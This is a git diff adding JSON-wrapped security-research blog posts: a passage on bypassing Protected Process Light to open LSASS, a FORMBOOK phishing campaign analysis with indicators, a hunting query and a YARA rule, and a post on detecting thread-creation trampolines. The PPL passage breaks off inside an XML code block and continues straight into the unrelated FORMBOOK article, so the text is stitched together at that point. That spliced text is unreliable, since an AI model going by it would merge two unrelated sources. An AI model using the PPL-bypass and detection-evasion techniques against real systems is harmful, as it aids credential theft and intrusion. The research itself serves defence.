accessed in a single location: in ci!CiCheckProcessDebugAccessPolicy, and this function is reached during a NtOpenProcess syscall. 
And, as the name of the newly discovered flag suggested earlier, any process whose PID is located in that list would bypass the Protection Level enforcement. This was confirmed practically in a [KD](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-using-kd-and-ntkd) session by setting an access breakpoint on that list (on our version of ci.dll this was located at ci+364d8). We also [enabled PPL on LSASS](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) and wrote a simple PowerShell script that would trigger a NtOpenProcess syscall:\n\n\n\nBy breaking at the call to nt!PsTestProtectedProcessIncompatibility in nt!PspProcessOpen, we can confirm that our PowerShell process attempts to target lsass.exe, which is a PPL process:\n\n\n\nNow to confirm the initial theory of what the PplDebuggingToken argument would do by forcing the return value of the call to nt!PsTestProtectedProcessIncompatibility:\n\n\n\nWe break at the instruction following the call to nt!PsTestProtectedProcessIncompatibility (which only calls CI!CiCheckProcessDebugAccessPolicy), and force the return value to 0 (as mentioned earlier a value of 1 means incompatible):\n\n\n\nSuccess! We obtained a handle to LSASS despite it being PPL, confirming our theory. Summarizing, if we can find a “valid value” (we’ll dig into that soon) it will pass the check of SbValidateAndParseDebugAuthToken() in ci!CiSetDebugAuthInformation(), and we would have a universal PPL bypass. If this sounds too good to be true, that’s mostly because it is — but confirming it requires developing a better understanding of what CI.dll is doing.\n\n### Understanding Code Integrity policies\n\nRestrictions based on code integrity, such as those used by AppLocker, can be enforced through policies, which in their human readable form are XML files. There are two types of policies: base and supplemental. 
Examples of what base policies look like can be found in their XML format in \"C:\\Windows\\schemas\\CodeIntegrity\\ExamplePolicies\\\". This is what a Base Policy looks like in its XML form (taken from \"C:\\Windows\\schemas\\CodeIntegrity\\ExamplePolicies\\AllowAll.xml\"), which reveals most of the details we’re interested in clearly in plaintext.\n\n```\n\n\n1.0.1.0\n{A244370E-44C9-4C06-B551-F6016E563076}\n{A244370E-44C9-4C06-B551-F6016E563076}\n{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}\n\n\n\n\n\n\n\nGetting Started - Apache HTTP Server Version 2.5\n...truncated…\n\n```\n\nDeobfuscating the JavaScript using the same debugger as before, we can see several ActiveXObjects. This time, however, there are far fewer and the execution is more prescripted, eliminating useless calls. This shows a refinement from before. This newer code also uses a .wsf extension instead of the previous .cpl. This allows the exploit to use the Windows Scripting Host to execute code. This is the same directory traversal technique we observed in the Testing phase. However, this time the JavaScript is looking for the Profile.rar file (whereas in the Testing phase, it was looking for IECache.inf) and attempting to execute the PowerShell script, which was prepended in Profile.rar as a Windows Script File (.wsf).\n\n\n\n#### Dropper\n\nAs we illustrated above, Profile.rar has a prepended Base64 encoded PowerShell command which downloads abb01.exe. 
The JavaScript from Profile.html attempts to execute this PowerShell code within Profile.rar as a Windows Script File.\n\nabb01.exe is a dropper that, when dynamically executed, drops another PE file (yxojzzvhi0.exe in our example).\n\n#### FORMBOOK Binary\n\nyxojzzvhi0.exe was scanned with Elastic YARA rules and identified to be a variant of [FORMBOOK](https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook), based on unique byte sequences.\n\nFORMBOOK, also known as XLOADER, is an information stealer that includes keylogger, clipboard copier, and form grabber components to collect and exfiltrate sensitive information. This malware has been [offered as-a-service](https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I) for over five years and remains a successful tool for stealing information.\n\n### Generic phase\n\nOn October 28 and November 8, 2021, we observed additional sightings that used a generic phishing attachment tactic to load FORMBOOK. Additionally, we were able to collect some information from the email header that we’ll discuss in the Campaign Analysis section.\n\n\n\nThese sightings all have two RAR attachments. One of the attachments has a .rar file extension and the other has either a .gz or .7z extension. We’ll explore one of the sightings below.\n\n```\n$ file D2110-095.gz DWG.rar\nD2110-095.gz: RAR archive data, v5\nDWG.rar: RAR archive data, v5\n```\n\nThe RAR files contained two PE files. 
They were identical instances of a very [common FORMBOOK variant](https://www.virustotal.com/gui/file/4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096/detection).\n\n```\n$ omnihash DWG.exe D2110-095.exe\nHashing file DWG.exe\n MD5: ff882802d113ed02fa070c496f89d797\n SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b\n SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096\nHashing file D2110-095.exe\n MD5: ff882802d113ed02fa070c496f89d797\n SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b\n SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096\n```\n\n## Campaign analysis\n\nWhile researching this FORMBOOK campaign, we observed infrastructure reuse and tooling similarities during testing and operational phases, which we believe represent a single campaign.\n\n\n\n### Email header\n\nThroughout all sightings, the campaign used similar sending email addresses:\n\n- admin0011[@]issratech.com\n- admin010[@]backsjoy.com\n- admin012[@]leoeni.com\n\nAdditionally, across the Production and Generic phases of the campaign, we observed the X-Mailer element (the software identifier set by the sending email client) as RainLoop/1.16.0. RainLoop is an open-source email client. It should be noted that in our collection, one sighting had some header information sanitized before being uploaded to VirusTotal. RainLoop could have been referenced in this sighting, but we were not able to confirm that.\n\n### File hashes\n\nAcross the Production phase, we were able to identify code sharing through the use of the same attachment (Profile.rar).\n\n### IP addresses\n\nAcross the Testing and Production phases, we observed that 104[.]244[.]78[.]177 was used for all elements of the campaigns. This IP address was used to host archives, implants, and scripts.\n\n### Resource development\n\nAs research progressed, we observed activities we believed were capability testing. 
This activity was observed one time and used artifacts ([IEcache.inf](https://github.com/aslitsecurity/CVE-2021-40444_builders/blob/main/CVE-2021-40444/IEcache.inf), [document.xml.rels](https://raw.githubusercontent.com/aslitsecurity/CVE-2021-40444_builders/main/CVE-2021-40444/source/doc/word/_rels/document.xml.rels)) from a public CVE-2021-40444 exploit proof-of-concept [repository](https://github.com/aslitsecurity/CVE-2021-40444_builders). Other phases included custom exploit code that differed from the PoC code but shared [initial access](https://attack.mitre.org/techniques/T1566/001) and [execution](https://attack.mitre.org/techniques/T1203) TTPs as well as the same network infrastructure.\n\nWe observed that the issratech[.]com, backsjoy[.]com, and leoeni[.]com domains have TLS certificates issued by Let’s Encrypt. While the steps of creating a TLS certificate are not overly cumbersome, the fact that the domain owner went through the preparatory process of creating a certificate could indicate that these domains are intended to be used for future encrypted operations.\n\nIn the Generic phase, the campaign abandoned the MSHTML exploit and attempted to leverage a traditional phishing malware-attachment approach. This shift in tactics possibly occurred because patching rendered the exploit ineffective.\n\n### Victimology\n\nWe observed that all four of the companies targeted by this campaign were in the manufacturing vertical. Threat actors utilizing FORMBOOK have been observed targeting the manufacturing vertical [in the past](https://threatpost.com/formbook-malware-targets-us-defense-contractors-aerospace-and-manufacturing-sectors/128334/). 
The companies all had international footprints in:\n\n- Industrial Materials, Aluminum extrusion, HQ in Germany (Testing phase)\n- Industrial Conglomerate, Industrial Chemicals, HQ in South Korea (Production phase)\n- Industrial Manufacturing Products and Consulting, HQ in Switzerland (Generic phase)\n- Industrial Mechanical Engineering and Manufacturing, HQ in Germany (Generic phase)\n\nWhile the targeted companies are of note (in that they are in the same vertical), an email address domain observed in all three phases, issratech[.]com, appears similar to a legitimate Jamaican company domain, isratech[.]com (notice the difference between one and two s's), a business that specializes in irrigation, wastewater management, and solar energy. Below is a screenshot of issratech[.]com using the default CyberPanel landing page. CyberPanel is a web hosting tool for WordPress sites.\n\n\n\nEach company targeted from the admin0011[@]issratech.com email address has expertise or products that could have been valuable to an Isratech project listed on their projects page (`https://www.isratech[.]com/projects/`):\n\n- Chemical: Waste-water treatment, dairy production sanitation\n- Extruded aluminum: Solar array scaffolding, greenhouses\n\nTwo additional email address domains were observed in the Generic phase — one appears to be mimicking a legitimate medical equipment manufacturer (backjoy[.]com) and the other (leonei[.]com) appears to be adversary controlled but seemingly not used for legitimate purposes.\n\n> leonei[.]com is protected by a Denial-of-Service protection service, so their domain IP address likely represents multiple legitimate domains and any blocking of the leonei[.]com IP address from the indicator table should be carefully measured.\n\nIt is possible, but not confirmed, that the recipients of the phishing emails in all phases are from a list of email addresses in the manufacturing vertical. 
These email lists are commonly available for purchase to enable sales, marketing, and business-to-business (B2B) efforts but can also be used for phishing campaigns.\n\n## Tactics\n\nUsing the MITRE ATT&CK® framework, tactics represent the why of a technique or sub technique. It is the adversary’s tactical goal: the reason for performing an action.\n\nObserved tactics:\n\n- Resource development\n- Initial access\n- Execution\n\n## Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\nObserved techniques/sub techniques\n\n- Acquire infrastructure - server\n- Obtain capabilities - malware and exploits\n- Stage capabilities - upload malware\n- Phishing - attachment\n- Command and scripting interpreter - PowerShell\n- Exploitation for client execution\n\n## Detections\n\n### Hunting queries\n\nThese queries can be used in Kibana’s Security → Timelines → New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.\n\nThis query will identify the CVE-2021-40444 exploit attempt from a malicious Access, Publisher, PowerPoint, or Word document.\n\n```\nprocess where event.type in (\"start\", \"process_started\") and process.parent.name : (\"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\", \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\") and process.command_line :\n (\"*../../..*\",\n \"*..\\\\..\\\\*\",\n \"*cpl:..*\",\n \"*hta:..*\",\n \"*js:..*\",\n \"*jse:..*\",\n \"*sct:..*\",\n \"*vbs:..*\",\n \"*wsf:..*\")\n```\n\n\n\n### YARA rule\n\nWe have created a YARA rule to identify this FORMBOOK activity.\n\n```\nrule Windows_Trojan_FORMBOOK {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2021-06-14\"\n last_modified = \"2021-08-23\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = 
\"FORMBOOK\"\n threat_name = \"Windows.Trojan.FORMBOOK\"\n reference_sample = \"6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a\"\n strings:\n $a1 = { 3C 30 50 4F 53 54 74 09 40 }\n $a2 = { 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 }\n $a3 = { 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 }\n $a4 = { 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 }\n condition:\n any of them\n}\n```\n\n## Defensive Recommendations\n\nThe following steps can be leveraged to improve a network’s protective posture:\n\n1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat\n2. Review and ensure that you have deployed the latest Microsoft Security Updates\n3. Maintain backups of your critical systems to aid in quick recovery\n\n## References\n\nThe following research was referenced throughout the document:\n\n- [https://nvd.nist.gov/vuln/detail/CVE-2021-40444](https://nvd.nist.gov/vuln/detail/CVE-2021-40444)\n- [https://twitter.com/vxunderground/status/1436326057179860992?s=20](https://twitter.com/vxunderground/status/1436326057179860992?s=20)\n- [https://github.com/lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444)\n- [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444)\n- [https://github.com/aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders)\n- [https://github.com/klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444)\n- [https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/](https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/)\n- [https://github.com/Edubr2020/CVE-2021-40444–CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless)\n- 
[https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I](https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I)\n\n## Indicators\n\n| Indicator                                                        | Type        | Reference from blog   | Note                                 |\n| ---------------------------------------------------------------- | ----------- | --------------------- | ------------------------------------ |\n| 70defbb4b846868ba5c74a526405f2271ab71de01b24fbe2d6db2c7035f8a7df | SHA256      | Request Document.docx | Testing phase email attachment       |\n| 7c98db2063c96082021708472e1afb81f3e54fe6a4a8b8516e22b3746e65433b | SHA256      | comres.cab            | Testing phase CAB archive            |\n| 363837d5c41ea6b2ff6f6184d817c704e0dc5749e45968a3bc4e45ad5cf028d7 | SHA256      | 1.doc.inf             | Testing phase VMProtect DLL          |\n| 22cffbcad42363841d01cc7fef290511c0531aa2b4c9ca33656cc4aef315e723 | SHA256      | IEcache.inf           | Testing phase DLL loader             |\n| e2ab6aab7e79a2b46232af87fcf3393a4fd8c4c5a207f06fd63846a75e190992 | SHA256      | Pope.txt              | Testing phase JavaScript             |\n| 170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6 | SHA256      | Profile.rar           | Production phase email attachment    |\n| d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72 | SHA256      | document.docx         | Production phase compressed document |\n| 776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2 | SHA256      | abb01.exe             | Production phase dropper             |\n| 95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82 | SHA256      | Profile.html          | Production phase JavaScript          |\n| bd1c1900ac1a6c7a9f52034618fed74b93acbc33332890e7d738a1d90cbc2126 | SHA256      | yxojzzvhi0.exe        | FORMBOOK malware                     |\n| 0c560d0a7f18b46f9d750e24667721ee123ddd8379246dde968270df1f823881 | SHA256      | DWG.rar               | Generic phase email attachment       |\n| 
5a1ef64e27a8a77b13229b684c09b45a521fd6d4a16fdb843044945f12bb20e1 | SHA256 | D2110-095.gz | Generic phase email attachment |\n| 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096 | SHA256 | D2110-095.exe DWG.exe | FORMBOOK malware |\n| admin0011[@]issratech.com | email-addr | | Phishing sending email address |\n| admin010[@]backsjoy.com | email-addr | | Phishing sending email address |\n| admin012[@]leoeni.com | email-addr | | Phishing sending email address |\n| issratech[.]com | domain-name | | Adversary controlled domain |\n| backsjoy[.]com | domain-name | | Adversary controlled domain |\n| leonei[.]com | domain-name | | Adversary controlled domain |\n| 2[.]56[.]59[.]105 | ipv4-addr | | IP address of issratech[.]com |\n| 212[.]192[.]241[.]173 | ipv4-addr | | IP address of backsjoy[.]com |\n| 52[.]128[.]23[.]153 | ipv4-addr | | IP address of leonei[.]com |\n| 104[.]244[.]78[.]177 | ipv4-addr | | Adversary controlled IP address |\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4f6fe2c619b93195/628e88d930bc9653db3af066/formbook-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "FORMBOOK Adopts CAB-less Approach",
+ "slug": "formbook-adopts-cab-less-approach",
+ "date": "2022-06-07",
+ "description": "Campaign research and analysis of an observed FORMBOOK intrusion attempt.",
+ "author": [
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-security-laptop-720x420.png",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "formbook",
+ "malware",
+ "phishing",
+ "cve-2021-40444"
+ ]
+ },
+ "id": "security_labs_content-formbook_adopts_cab_less_approach-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md.json
new file mode 100644
index 00000000000..da29fa5b145
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Get-InjectedThreadEx – Detecting Thread Creation Trampolines\"\nslug: \"get-injectedthreadex-detection-thread-creation-trampolines\"\ndate: \"2022-12-07\"\ndescription: \"In this blog, we will demonstrate how to detect each of four classes of process trampolining and release an updated PowerShell detection script – Get-InjectedThreadEx\"\nauthor:\n - slug: john-uhlmann\nimage: \"photo-edited-02-e.jpg\"\ncategory:\n - slug: security-research\ntags:\n - windows internals\n - process injection\n - defense evasion\n---\n\nThe prevalence of [memory resident malware](https://www.elastic.co/blog/hunting-memory) remains extremely high. Defenders have imposed significant costs on file-based techniques, and malware must typically utilize [in-memory techniques](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) to avoid detection. In Elastic's recently-published [Global Threat Report](https://t.co/3PZDENisXK), defense evasion is the most diverse tactic we observed and represents an area of rapid, continuous innovation.\n\nIt is convenient, and sometimes necessary, for memory-resident malware to create its own threads within its surrogate process. Many such threads can be detected with relatively low noise by identifying those which have a start address not backed by a Portable Executable (PE) image file on disk. This detection technique was originally conceived by Elastic's [Gabriel Landau](https://twitter.com/GabrielLandau) and Nicholas Fritts for the Elastic Endgame product. 
Shortly thereafter, it was released as a PowerShell script for the benefit of the community in the form of [Get-InjectedThread](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) with the help of [Jared Atkinson](https://twitter.com/jaredcatkinson) and Elastic's [Joe Desimone](https://twitter.com/dez_) at the [2017 SANS Threat Hunting and IR Summit](https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory).\n\nAt a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.\n\n\n\nHowever, an adversary often has sufficient control to create a thread with an image-backed start address which will subsequently transfer execution to their unbacked memory. 
When this transfer is done immediately, it is known as a “trampoline” as you are quickly catapulted somewhere else.\n\nThere are four broad classes of trampolines – you can build your own from scratch, you can use an illusionary trampoline, you can repurpose something else as a trampoline, or you can simply find an existing trampoline.\n\nIn other words - hooks, hijacks, gadgets and functions.\n\nEach of these will bypass our original unbacked executable memory heuristic.\n\nI highly recommend these two excellent blogs as background:\n\n- [Understanding and Evading Get-InjectedThread](https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/) by Adam Chester.\n- [Avoiding Get-InjectedThread for Internal Thread Creation](https://www.trustedsec.com/blog/avoiding-get-injectedthread-for-internal-thread-creation/) by Christopher Paschen.\n\nIn this blog, we will demonstrate how to detect each of these classes of bypass and release an updated PowerShell detection script – [Get-InjectedThreadEx](https://github.com/jdu2600/Get-InjectedThreadEx).\n\n## CreateThread() overview\n\nAs a quick recap, the Win32 [CreateThread()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) API lets you specify a pointer to a desired StartAddress which will be used as the entrypoint of a function that takes exactly one user-provided parameter.\n\n\n\nSo, CreateThread() is effectively a simple shellcode runner.\n\n\n\nAnd its sibling, [CreateRemoteThread()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) is effectively remote process injection.\n\nThe value of the lpStartAddress parameter is stored by the kernel in the Win32StartAddress field within the [ETHREAD](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/ethread/) structure for that thread.\n\n\n\nThis value can be queried from user mode using the documented 
[NtQueryInformationThread()](https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationthread) syscall with the ThreadQuerySetWin32StartAddress information class. A subsequent call to [VirtualQueryEx()](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualqueryex) can be used to make a second syscall requesting the [basic memory information](https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-memory_basic_information) for that virtual address from the kernel. This includes an enumeration indicating whether the memory is a mapped PE image, a mapped file, or simply private memory.\n\n\n\nWhile the original script was a point-in-time retrospective detection implementation, the same information is available inline during [create thread notify](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine) kernel callbacks. All effective Endpoint Detection and Response (EDR) products should be providing telemetry of suspicious thread creations.\n\nAnd all effective Endpoint Protection Platform (EPP) products should be denying suspicious thread creations by default – with a mechanism to add allowlist entries for legitimate software exhibiting this behavior.\n\nIn the wild, you’ll see “legitimate” instances of this behavior such as from other security products, anti-cheat software, older copy-protection software and some Unix products that have been shimmed to work on Windows. Though, in each instance, this security [code smell](https://en.wikipedia.org/wiki/Code_smell) may be indicative of software that you might not want in an enterprise environment. The use of these methods may be a leading indicator that other [security best practices](https://blog.trailofbits.com/2018/09/26/effortless-security-feature-detection-with-winchecksec/) have not been followed. 
Even with this finite set of exceptions to handle, this detection and/or prevention approach remains highly relevant and successful today.\n\n### 1 - Bring your own trampoline\n\nThe simplest trampoline is a small hook. The adversary only needs to write the necessary jump instruction into existing image-backed memory. This is the approach that Filip Olszak used to bypass Get-InjectedThread with [DripLoader](https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection).\n\nThese bytes can even be restored to their original values immediately after thread creation. This helps to avoid retrospective detections such as our script – but recall that your endpoint security product should be doing _inline_ detection and will be able to scrutinize the hooked thread entrypoint at execution time, and deny execution if necessary.\n\n\n\nThe above proof-of-concept hooks ntdll!DbgUiRemoteBreakin, which is a legitimate remote thread start address, though it should rarely be seen in production environments. In practice, the hook can be placed on any function bytes unlikely to be called in normal operation– or even slack space between functions, or at the end of the PE section.\n\nAlso note the use of WriteProcessMemory() instead of a simple memcpy(). MEM_IMAGE pages are typically read only, and the former handles toggling the page protections to writable and back for us.\n\nWe can detect hooked start addresses fairly easily because we can detect persistent inline hooks fairly easily. In order to save memory, allocations for shared libraries use the same backing physical memory pages and are marked COPY_ON_WRITE in each process’s address space. So, as soon as the hook is inserted, the whole page can no longer be shared. 
Instead, a copy is created in the working set of the process.\n\nUsing the [QueryWorkingSetEx()](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-queryworkingsetex) API, we can query the kernel to determine whether the page containing the start address is sharable or is in a private working set.\n\nNow we know that something on the page was modified – but we don’t know if our address was hooked. And, for our updated PowerShell script, this is all that we do. Recall that the bytes can be unhooked after the thread has started– so any further checks on already running threads could result in a false negative.\n\nHowever, this could also be a false positive if there is a “legitimate” hook or other modification.\n\nIn particular, many, many security products still hook ntdll.dll. This was an entirely legitimate technical approach back in 2007 when Vista was released: it allowed existing x86 features based on kernel syscall hooks to be quickly ported to the nascent x64 architecture using user mode syscall hooks instead. The validity of such approaches has been more questionable since Windows 10 was released in 2015. Around this time, x64 was cemented as the primary Windows architecture and we could firmly relegate the less secure x86 Windows to legacy status. The value proposition for user mode hooking was further reduced in 2017 when Windows 10 Creators Update [added additional kernel mode instrumentation](https://blog.redbluepurple.io/windows-security-research/kernel-tracing-injection-detection) to provide more robust detection approaches for malicious usage of certain abused syscalls.\n\nFor reference, our original Elastic Endgame product has features implemented using user mode hooks whereas our newer Elastic Endpoint has not yet determined a need to use a user mode hook at all in order to attain equal or better protection compared to Endgame. 
This means that Elastic Endgame must defend these hooks from tampering whereas Elastic Endpoint is currently invulnerable to the various so-called “universal EDR bypasses” that perform ntdll.dll unhooking.\n\nOlder security products aside, there are also many products that extend the functionality of other products via hooks– or perhaps unpack their code at runtime, etc. So, if that 4KB page is private, then security products need to additionally compare the start address bytes to an original pristine copy and alert if they differ.\n\nAnd, to deploy at scale, they also need to maintain an allowlist for those rare legitimate uses.\n\n### 2 - Shifting the trampoline mat\n\nTechnically the security product will only be able to see the bytes at the time of the thread notification callback which is slightly before the thread executes. Malware could create a [suspended](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread#parameters) thread, let the thread callback execute, and only then hook the start bytes before finally resuming the thread. Don’t worry though - effective security products can detect that inline too. But that’s a topic for another day.\n\nThis brings us to the second trampoline approach though: hijacking the execution flow before the entrypoint is ever called. 
Why obviously hook the thread entrypoint of our suspended thread when, with a little sleight of hand, we can usurp execution by modifying its instruction pointer directly (or an equivalent context manipulation) with [SetThreadContext()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext), or by queuing an [“early bird” Asynchronous Procedure Call](https://www.cyberbit.com/endpoint-security/new-early-bird-code-injection-technique-discovered/) (APC)?\n\nThe problem with creating the illusion of a legitimate entrypoint like this is that it doesn’t hold up to any kind of rigorous inspection.\n\nIn a normal thread, the user mode start address is typically the third function call in the thread’s stack – after ntdll!RtlUserThreadStart and kernel32!BaseThreadInitThunk. So when the thread has been hijacked, this is going to be obvious in the call stack.\n\nFor instruction pointer manipulation, the first frame will belong to the injected code.\n\nFor “early bird” APC injection, the base of the call stack will be ntdll!LdrInitializeThunk, ntdll!NtTestAlert, ntdll!KiUserApcDispatcher and then the injected code.\n\nThe updated script detects various anomalous call stack bases.\n\nFalse positives are possible where legitimate software finds it necessary to modify Windows process or thread initialisation. For example, this was observed with the [MSYS2](https://www.msys2.org/) Linux environment. There is also an edge case where a function might have been generated with a [Tail Call Optimisation](https://en.wikipedia.org/wiki/Tail_call) (TCO), which eliminates unnecessary stack frames for performance. However, these cases can all be easily handled with a small exception list.\n\n### 3 - If it walks like a trampoline, and it talks like a trampoline...\n\nThe third trampoline approach is to find a suitable gadget within image-backed memory so that no code modification is necessary. 
This is one of the approaches that Adam Chester employed in his blog.\n\nOur earlier hook was 12 bytes and finding an exact 12-byte gadget is unlikely in practice.\n\nHowever, on x64 Windows, functions use a four-register fast-call calling convention by default. So when the OS calls our gadget we will have control over the RCX register which will contain the parameter we passed into CreateThread().\n\nThe simplest x64 gadget is the two-byte JMP RCX instruction “ff e1” – which is fairly trivial to find.\n\n\n\nGadgets don’t even need to be instructions per se – they could be within operands or other data in the code section. For example, the above “ff e1” gadget in ntdll.dll was part of the relative address of a GUID.\n\nWe can detect this too- because it doesn’t work generically yet.\n\nIn all modern Windows software, thread start addresses are protected by Control Flow Guard (CFG) which has a bitmap of valid indirect call targets computed at compile time. In order to use this gadget, malware must either first disable CFG or call the [SetProcessValidCallTargets()](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-setprocessvalidcalltargets) function to ask the kernel to dynamically set the bit corresponding to this gadget in the CFG bitmap.\n\nJust to be clear: this is not a CFG bypass. It is a CFG feature to support legitimate software doing weird things. Remember that CFG is an exploit protection– and being able to call SetProcessCallTargets() in order to call CreateThread() is a chicken and egg problem for exploit developers.\n\nLike before, to save memory, the CFG bitmap pages for DLLs are also shared between processes. 
This time we can detect whether the start address’s CFG bitmap entry is on a sharable page or in a private working set- and alert if it is private.\n\nControl Flow Guard is described in detail [elsewhere](https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass-Control-Flow-Guard-Comprehensively-wp.pdf), but a high level CFG overview here is helpful to understanding our approach to detection. Each two bits in the CFG bitmap corresponds to 16 addresses. Two bits gives us four states. Specifically, in a pretty neat optimization by Microsoft, two states correspond only to the 16-byte aligned address (allowed, and export suppressed) and two states correspond to all 16 addresses (allowed and denied).\n\nModern CPUs fetch instructions in 16-byte lines so modern compilers typically align the vast majority of function entrypoints to 16-bytes. The vast majority of CFG entries only set a single address as a valid indirect call target, and very few entries will specify a whole block of 16 addresses as valid call targets. This means that the CFG bitmap can be an eighth of the size without any appreciable increase in the risk of valid gadgets due to an overly permissive bitmap.\n\nHowever, if each two bits corresponds to 16 addresses, then a private 4K page of CFG bits corresponds to 256KB of code. That’s quite the false positive potential!\n\nTherefore, we just have to hope that legitimate code never does this… nevermind. You should never hope that legitimate code won’t do obscure things. 
To date, we’ve identified three contemporary scenarios:\n\n- The legacy Edge browser would [harden its javascript host process](https://web.archive.org/web/20161031134827/http://blog.trendmicro.com/trendlabs-security-intelligence/control-flow-guard-improvements-windows-10-anniversary-update/) by un-setting CFG bits for certain abusable functions\n- user32.dll appears to be too kind to legacy software – and will un-suppress export addresses if they are registered as call back functions\n- Some security products will drop a page of hook trampolines too close to legitimate modules and private executable memory always has private bitmap entries (Actually they’ll often drop this at a module’s preferred load address – which prevents the OS from sharing memory for that module)\n\nSo we need to rule out false positives by comparing against an expected CFG bitmap value. We could read this from the PE file on disk, but the x64 bitmap is already mapped into our process as part of the shared CFG bitmap.\n\nThe PowerShell script implementation we’ve released alerts on both cases: a modified CFG page and a start address with a non-original CFG value.\n\nA very small number of CFG-compatible gadgets [might](https://i.blackhat.com/briefings/asia/2018/asia-18-Lain-Back-To-The-Epilogue-How-To-Evade-Windows-Control-Flow-Guard-With-Less-Than-16-Bytes.pdf) [exist](https://www.ndss-symposium.org/wp-content/uploads/2018/02/ndss2018_05A-3_Biondo_paper.pdf) at a given point in time, but only in very specific DLLs that will likely appear anomalous in the surrogate process.\n\n### 4 - It's literally already a trampoline\n\nThe third bypass category is to find an existing function that does exactly what we want, and there are many of these. For example, the one highlighted by Christopher Paschen is Microsoft’s C Runtime (CRT). 
